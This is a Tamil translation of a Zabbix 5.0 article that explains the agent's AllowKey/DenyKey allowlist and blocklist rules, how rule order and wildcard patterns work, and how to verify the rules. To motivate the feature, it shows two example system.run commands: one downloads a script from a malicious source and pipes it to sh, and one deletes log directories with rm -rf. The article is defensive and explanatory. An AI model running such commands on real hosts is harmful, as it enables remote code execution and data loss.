Zabbix 5.0 இல் முகவர் பக்க அளவீடுகளுக்கான தடுப்புப்பட்டியல் மற்றும் அனுமதிப்பட்டியல் ஆதரவு

முகவர் பக்க அளவீடுகளுக்கான தடுப்புப்பட்டியல் மற்றும் அனுமதிப்பட்டியல் ஆதரவு

டிகோன் உஸ்கோவ், ஒருங்கிணைப்பு பொறியாளர், Zabbix

தரவு பாதுகாப்பு சிக்கல்கள்

Zabbix 5.0 ஒரு புதிய அம்சத்தைக் கொண்டுள்ளது, இது Zabbix Agent ஐப் பயன்படுத்தி கணினிகளில் பாதுகாப்பை மேம்படுத்த உங்களை அனுமதிக்கிறது மற்றும் பழைய அளவுருவை மாற்றுகிறது ரிமோட் கமாண்ட்களை இயக்கு.

முகவர் அடிப்படையிலான அமைப்புகளின் பாதுகாப்பில் மேம்பாடுகள், ஒரு முகவர் அதிக எண்ணிக்கையிலான ஆபத்தான செயல்களைச் செய்ய முடியும் என்பதிலிருந்து உருவாகிறது.

• உள்ளமைவுக் கோப்புகள், பதிவுக் கோப்புகள், கடவுச்சொல் கோப்புகள் அல்லது வேறு ஏதேனும் கோப்புகளிலிருந்து இரகசியமான அல்லது ஆபத்தான தகவல் உட்பட கிட்டத்தட்ட எந்தத் தகவலையும் முகவர் சேகரிக்க முடியும்.

எடுத்துக்காட்டாக, zabbix_get பயன்பாட்டைப் பயன்படுத்தி பயனர்களின் பட்டியல், அவர்களின் முகப்பு கோப்பகங்கள், கடவுச்சொல் கோப்புகள் போன்றவற்றை அணுகலாம்.

zabbix_get பயன்பாட்டைப் பயன்படுத்தி தரவை அணுகுகிறது

குறிப்பு. தொடர்புடைய கோப்பில் ஏஜென்ட் அனுமதிகளைப் படித்திருந்தால் மட்டுமே தரவை மீட்டெடுக்க முடியும். ஆனால், உதாரணமாக, கோப்பு /etc/passwd/ அனைத்து பயனர்களும் படிக்கக்கூடியது.

• முகவர் அபாயகரமான கட்டளைகளையும் செயல்படுத்த முடியும். எடுத்துக்காட்டாக, விசை *system.run[]** நெட்வொர்க் நோட்களில் எந்த ரிமோட் கட்டளைகளையும் இயக்க அனுமதிக்கிறது, இதில் Zabbix இணைய இடைமுகத்திலிருந்து ஸ்கிரிப்ட்களை இயக்குகிறது, அவை முகவர் பக்கத்தில் கட்டளைகளை இயக்குகின்றன.

# zabbix_get -s my.prod.host -k system.run["wget http://malicious_source -O- | sh"]

# zabbix_get -s my.prod.host -k system.run["rm -rf /var/log/applog/"]

• லினக்ஸில், ஏஜென்ட் ரூட் சலுகைகள் இல்லாமல் இயல்புநிலையாக இயங்குகிறது, விண்டோஸில் இது ஒரு சேவையாக இயங்குகிறது மற்றும் கோப்பு முறைமைக்கான தடையற்ற அணுகலைக் கொண்டுள்ளது. அதன்படி, நிறுவலுக்குப் பிறகு Zabbix முகவர் அளவுருக்களில் எந்த மாற்றமும் செய்யப்படவில்லை என்றால், முகவருக்கு பதிவேடு, கோப்பு முறைமைக்கான அணுகல் உள்ளது மற்றும் WMI வினவல்களை இயக்க முடியும்.

முந்தைய பதிப்புகளில் அளவுரு EnableRemoteCommands=0 விசையுடன் அளவீடுகளை முடக்க மட்டுமே அனுமதிக்கப்படுகிறது *system.run[]** மற்றும் இணைய இடைமுகத்திலிருந்து இயங்கும் ஸ்கிரிப்ட்கள், ஆனால் தனிப்பட்ட கோப்புகளுக்கான அணுகலைக் கட்டுப்படுத்தவோ, முகவருடன் நிறுவப்பட்ட தனிப்பட்ட விசைகளை அனுமதிக்கவோ அல்லது முடக்கவோ அல்லது தனிப்பட்ட அளவுருக்களின் பயன்பாட்டைக் கட்டுப்படுத்தவோ வழி இல்லை.

Zabbix இன் முந்தைய பதிப்புகளில் EnableRemoteCommand அளவுருவைப் பயன்படுத்துதல்

AllowKey/DenyKey

ஏஜென்ட் தரப்பில் அளவீடுகளை அனுமதிப்பதற்கும் மறுப்பதற்கும் அனுமதிப்பட்டியல்கள் மற்றும் தடுப்புப்பட்டியல்களை வழங்குவதன் மூலம் Zabbix 5.0 அத்தகைய அங்கீகரிக்கப்படாத அணுகலுக்கு எதிராகப் பாதுகாக்க உதவுகிறது.

Zabbix 5.0 இல் * உட்பட அனைத்து விசைகளும்system.run[]** இயக்கப்பட்டது, மேலும் இரண்டு புதிய முகவர் உள்ளமைவு விருப்பங்கள் சேர்க்கப்பட்டுள்ளன:

AllowKey= - அனுமதிக்கப்பட்ட காசோலைகள்;

DenyKey= - தடைசெய்யப்பட்ட காசோலைகள்;

மெட்டாக்ராக்டர்களைப் பயன்படுத்தும் அளவுருக்கள் கொண்ட ஒரு முக்கிய பெயர் முறை எங்கே (*).

AllowKey மற்றும் DenyKey விசைகள் ஒரு குறிப்பிட்ட வடிவத்தின் அடிப்படையில் தனிப்பட்ட அளவீடுகளை அனுமதிக்க அல்லது மறுக்க அனுமதிக்கின்றன. மற்ற உள்ளமைவு அளவுருக்கள் போலல்லாமல், AllowKey/DenyKey அளவுருக்களின் எண்ணிக்கை வரையறுக்கப்படவில்லை. காசோலைகளின் மரத்தை உருவாக்குவதன் மூலம் கணினியில் முகவர் சரியாக என்ன செய்ய முடியும் என்பதைத் தெளிவாக வரையறுக்க இது உங்களை அனுமதிக்கிறது - இயங்கக்கூடிய விசைகள், அவை எழுதப்பட்ட வரிசை மிக முக்கியமான பாத்திரத்தை வகிக்கிறது.

விதிகளின் வரிசை

உள்ளமைவு கோப்பில் உள்ளிடப்பட்ட வரிசையில் விதிகள் சரிபார்க்கப்படுகின்றன. முதல் போட்டிக்கு முன் விதிகளின்படி விசை சரிபார்க்கப்படுகிறது, மேலும் தரவு உறுப்பின் விசை முறையுடன் பொருந்தியவுடன், அது அனுமதிக்கப்படுகிறது அல்லது மறுக்கப்படுகிறது. இதற்குப் பிறகு, விதி சரிபார்ப்பு நிறுத்தப்படும் மற்றும் மீதமுள்ள விசைகள் புறக்கணிக்கப்படும்.

எனவே, ஒரு உறுப்பு அனுமதி மற்றும் மறுப்பு விதி இரண்டிற்கும் பொருந்தினால், உள்ளமைவு கோப்பில் எந்த விதி முதலில் உள்ளது என்பதைப் பொறுத்து முடிவு அமையும்.

ஒரே மாதிரி மற்றும் விசையுடன் 2 வெவ்வேறு விதிகள் vfs.file.size[/tmp/file]

AllowKey/DenyKey விசைகளைப் பயன்படுத்துவதற்கான வரிசை:

1. சரியான விதிகள்,
2. பொது விதிகள்,
3. தடை விதி.

எடுத்துக்காட்டாக, ஒரு குறிப்பிட்ட கோப்புறையில் உள்ள கோப்புகளுக்கான அணுகல் உங்களுக்குத் தேவைப்பட்டால், நீங்கள் முதலில் அவற்றை அணுக அனுமதிக்க வேண்டும், பின்னர் நிறுவப்பட்ட அனுமதிகளுக்குள் வராத அனைத்தையும் மறுக்க வேண்டும். மறுப்பு விதி முதலில் பயன்படுத்தப்பட்டால், கோப்புறைக்கான அணுகல் மறுக்கப்படும்.

சரியான வரிசை

நீங்கள் 2 பயன்பாடுகளை இயக்க அனுமதிக்க வேண்டும் என்றால் *system.run[]**, மற்றும் மறுக்கும் விதி முதலில் குறிப்பிடப்படும், பயன்பாடுகள் தொடங்கப்படாது, ஏனெனில் முதல் பேட்டர்ன் எப்போதும் எந்த விசையுடனும் பொருந்தும், மேலும் அடுத்தடுத்த விதிகள் புறக்கணிக்கப்படும்.

தவறான வரிசை

வடிவங்கள்

அடிப்படை விதிகள்

பேட்டர்ன் என்பது வைல்டு கார்டுகளுடன் கூடிய வெளிப்பாடு. மெட்டாஎராக்டர் (*) ஒரு குறிப்பிட்ட நிலையில் உள்ள எந்த எழுத்துகளின் எண்ணிக்கையையும் பொருத்துகிறது. மெட்டாக்ராக்டர்கள் முக்கிய பெயரிலும் அளவுருக்களிலும் பயன்படுத்தப்படலாம். எடுத்துக்காட்டாக, நீங்கள் முதல் அளவுருவை உரையுடன் கண்டிப்பாக வரையறுக்கலாம், அடுத்ததை வைல்டு கார்டாகக் குறிப்பிடவும்.

அளவுருக்கள் சதுர அடைப்புக்குறிக்குள் [] இணைக்கப்பட வேண்டும்.

• system.run[* - தவறு
• vfs.file*.txt] - தவறு
• vfs.file.*[*] - சரி

வைல்டு கார்டைப் பயன்படுத்துவதற்கான எடுத்துக்காட்டுகள்.

1. முக்கிய பெயர் மற்றும் அளவுருவில். இந்த வழக்கில், விசை ஒரு அளவுருவைக் கொண்டிருக்காத ஒத்த விசையுடன் ஒத்துப்போவதில்லை, ஏனெனில் முக்கிய பெயரின் ஒரு குறிப்பிட்ட முடிவையும் ஒரு குறிப்பிட்ட அளவுருக்களையும் பெற விரும்புகிறோம் என்று வடிவத்தில் சுட்டிக்காட்டினோம்.
2. வடிவமானது சதுர அடைப்புக்குறிகளைப் பயன்படுத்தவில்லை எனில், அளவுருக்கள் இல்லாத அனைத்து விசைகளையும் முறை அனுமதிக்கிறது மற்றும் குறிப்பிட்ட அளவுருவைக் கொண்டிருக்கும் அனைத்து விசைகளையும் மறுக்கிறது.
3. விசை முழுவதுமாக எழுதப்பட்டு, அளவுருக்கள் வைல்டு கார்டாகக் குறிப்பிடப்பட்டால், அது எந்த ஒத்த விசையுடனும் எந்த அளவுருக்களுடன் பொருந்தும் மற்றும் சதுர அடைப்புக்குறிகள் இல்லாத விசையுடன் பொருந்தாது, அதாவது அனுமதிக்கப்படும் அல்லது மறுக்கப்படும்.

அளவுருக்களை நிரப்புவதற்கான விதிகள்.

• அளவுருக்கள் கொண்ட விசையைப் பயன்படுத்த விரும்பினால், அளவுருக்கள் உள்ளமைவு கோப்பில் குறிப்பிடப்பட வேண்டும். அளவுருக்கள் ஒரு மெட்டாக்ராக்டராக குறிப்பிடப்பட வேண்டும். எந்தவொரு கோப்பிற்கான அணுகலையும் கவனமாக மறுப்பது மற்றும் வெவ்வேறு எழுத்துப்பிழைகளின் கீழ் - அளவுருக்கள் மற்றும் இல்லாமல் மெட்ரிக் என்ன தகவலை வழங்க முடியும் என்பதை கணக்கில் எடுத்துக்கொள்வது அவசியம்.

அளவுருக்கள் கொண்ட விசைகளை எழுதும் அம்சங்கள்

• ஒரு விசை அளவுருக்களுடன் குறிப்பிடப்பட்டிருந்தால், ஆனால் அளவுருக்கள் விருப்பமானவை மற்றும் மெட்டாக்ராக்டராக குறிப்பிடப்பட்டால், அளவுருக்கள் இல்லாத விசை தீர்க்கப்படும். எடுத்துக்காட்டாக, நீங்கள் CPU இல் உள்ள சுமை பற்றிய தகவலைப் பெறுவதை முடக்க விரும்பினால் மற்றும் system.cpu.load[*] விசையை முடக்க வேண்டும் என்று குறிப்பிட்டால், அளவுருக்கள் இல்லாத விசை சராசரி சுமை மதிப்பை வழங்கும் என்பதை மறந்துவிடாதீர்கள்.

அளவுருக்களை நிரப்புவதற்கான விதிகள்

குறிப்புகள்

சரிசெய்தல்

• சில விதிகளை பயனரால் மாற்ற முடியாது, எடுத்துக்காட்டாக, கண்டுபிடிப்பு விதிகள் அல்லது முகவர் தானாகப் பதிவு செய்யும் விதிகள். AllowKey/DenyKey விதிகள் பின்வரும் அளவுருக்களை பாதிக்காது:
  - புரவலன் பெயர் உருப்படி
  - HostMetadataItem
  - HostInterfaceItem

குறிப்பு. ஒரு நிர்வாகி ஒரு விசையை முடக்கினால், வினவப்படும்போது, ​​மெட்ரிக் அல்லது விசை ஏன் ' வகைக்குள் வருகிறது என்பது பற்றிய தகவலை Zabbix வழங்காது.ஒத்துழைக்கவில்லை'. ரிமோட் கட்டளைகளை இயக்குவதற்கான தடைகள் பற்றிய தகவல்களும் முகவர் பதிவு கோப்புகளில் காட்டப்படாது. இது பாதுகாப்பு காரணங்களுக்காக, ஆனால் சில காரணங்களுக்காக அளவீடுகள் ஆதரிக்கப்படாத வகைக்குள் வந்தால் பிழைத்திருத்தத்தை சிக்கலாக்கும்.

• வெளிப்புற உள்ளமைவு கோப்புகளை இணைக்க எந்த குறிப்பிட்ட வரிசையையும் நீங்கள் நம்பக்கூடாது (எடுத்துக்காட்டாக, அகரவரிசையில்).

கட்டளை வரி பயன்பாடுகள்

விதிகளை அமைத்த பிறகு, எல்லாம் சரியாக உள்ளமைக்கப்பட்டுள்ளதா என்பதை உறுதிப்படுத்த வேண்டும்.

நீங்கள் மூன்று விருப்பங்களில் ஒன்றைப் பயன்படுத்தலாம்:

• Zabbix இல் மெட்ரிக்கைச் சேர்க்கவும்.
• உடன் சோதிக்கவும் zabbix_agentd. விருப்பத்துடன் Zabbix முகவர் -அச்சு (-p) கட்டமைப்பால் அனுமதிக்கப்படாத அனைத்து விசைகளையும் (இயல்புநிலையாக அனுமதிக்கப்படும்) காட்டுகிறது. மற்றும் விருப்பத்துடன் -சோதனை (-டி) தடை செய்யப்பட்ட விசை திரும்ப வரும்ஆதரிக்கப்படாத உருப்படி விசை'.
• உடன் சோதிக்கவும் zabbix_get. பயன்பாடு zabbix_get விருப்பத்துடன் -k திரும்பி வருவேன்'ZBX_NOTSUPPORTED: அறியப்படாத அளவீடு'.

அனுமதிக்கவும் அல்லது மறுக்கவும்

நீங்கள் ஒரு கோப்பிற்கான அணுகலை மறுக்கலாம் மற்றும் சரிபார்க்கலாம், எடுத்துக்காட்டாக, பயன்பாட்டைப் பயன்படுத்தி zabbix_getகோப்பிற்கான அணுகல் மறுக்கப்படுகிறது.

**

குறிப்பு. அளவுருவில் உள்ள மேற்கோள்கள் புறக்கணிக்கப்படுகின்றன.

இந்த வழக்கில், அத்தகைய கோப்பிற்கான அணுகல் வேறு பாதை வழியாக அனுமதிக்கப்படலாம். எடுத்துக்காட்டாக, ஒரு சிம்லிங்க் அதற்கு வழிவகுத்தால்.

குறிப்பிட்ட விதிகளைப் பயன்படுத்துவதற்கான பல்வேறு விருப்பங்களைச் சரிபார்க்க பரிந்துரைக்கப்படுகிறது, மேலும் தடைகளைத் தவிர்ப்பதற்கான சாத்தியக்கூறுகளையும் கணக்கில் எடுத்துக்கொள்ளுங்கள்.

கேள்விகள் மற்றும் விடைகள்

உங்கள் கேள்வி. விதிகள், அனுமதிகள் மற்றும் தடைகளை விவரிக்க அதன் சொந்த மொழியுடன் கூடிய சிக்கலான வடிவம் ஏன் தேர்ந்தெடுக்கப்பட்டது? எடுத்துக்காட்டாக, Zabbix பயன்படுத்தும் வழக்கமான வெளிப்பாடுகளை ஏன் பயன்படுத்த முடியவில்லை?

பதில். இது ஒரு ரீஜெக்ஸ் செயல்திறன் சிக்கலாகும், ஏனெனில் பொதுவாக ஒரே ஒரு முகவர் மட்டுமே இருப்பார் மேலும் இது அதிக எண்ணிக்கையிலான அளவீடுகளை சரிபார்க்கிறது. Regex என்பது மிகவும் கடினமான செயல் மற்றும் ஆயிரக்கணக்கான அளவீடுகளை இந்த வழியில் எங்களால் சரிபார்க்க முடியாது. வைல்ட் கார்டுகள் - உலகளாவிய, பரவலாகப் பயன்படுத்தப்படும் மற்றும் எளிமையான தீர்வு.

உங்கள் கேள்வி. உள்ளடக்கிய கோப்புகள் அகரவரிசையில் சேர்க்கப்படவில்லையா?

பதில். எனக்குத் தெரிந்தவரை, நீங்கள் வெவ்வேறு கோப்புகளில் விதிகளைப் பரப்பினால், விதிகள் பயன்படுத்தப்படும் வரிசையைக் கணிப்பது கிட்டத்தட்ட சாத்தியமற்றது. அனைத்து AllowKey/DenyKey விதிகளையும் ஒரே Include கோப்பில் சேகரிக்க பரிந்துரைக்கிறேன், ஏனெனில் அவை ஒன்றுடன் ஒன்று தொடர்புகொள்வதால், இந்தக் கோப்பையும் உள்ளடக்கியது..

உங்கள் கேள்வி. Zabbix 5.0 இல் விருப்பம் 'EnableRemoteCommands=' உள்ளமைவு கோப்பில் காணவில்லை, மேலும் AllowKey/DenyKey மட்டும் கிடைக்குமா?

பதில். ஆம் அது சரிதான்.

உங்கள் கவனத்திற்கு நன்றி!

ஆதாரம்: www.habr.com